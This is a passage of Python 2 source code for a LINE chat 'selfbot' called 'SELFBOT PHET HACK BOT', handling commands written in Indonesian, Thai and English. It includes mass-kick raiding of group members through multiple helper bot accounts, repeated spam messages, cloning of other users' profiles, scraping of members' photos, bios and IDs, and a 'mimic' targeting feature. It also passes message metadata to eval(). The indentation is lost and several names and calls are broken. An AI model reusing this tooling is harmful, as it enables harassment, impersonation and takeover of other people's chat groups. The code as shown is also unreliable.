cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Com1:" in msg.text:
if msg.from_ in admin:
wait["Comment1"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#=================================================
elif msg.text == "แอบ":
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "ออกมา":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","adminlist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#staff-----------------------------------------------------------
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "Lo @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Cover @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.channel.getHome(target)
objId = h["result"]["homeInfo"]["objectId"]
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + target + "&oid=" + objId)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
#-----------------------------------------------
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
msg.contentType = 13
cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
cl.sendMessage(msg)
#=====================================================
elif 'Chah' in msg.text:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "NADYA,'"}
cl.sendMessage(msg)
#-----------------------------------------------
#==================================================
#=====================================================
#=================================================================================
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
Ki3.kickuotFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
Ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
Cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
Cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if LINETCRLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki.getProfile().mid
LINETCRLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if LINETCRLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------)
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,help2Message)
else:
cl.sendText(msg.to,help2Message)
#----------------------ADMIN COMMAND------------------------------#
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall","มอง","."]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
for i in gid:
if i is not None:
try:
cl.rejectGroupInvitation(i)
except:
cl.sendText(msg.to,"Error!")
break
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
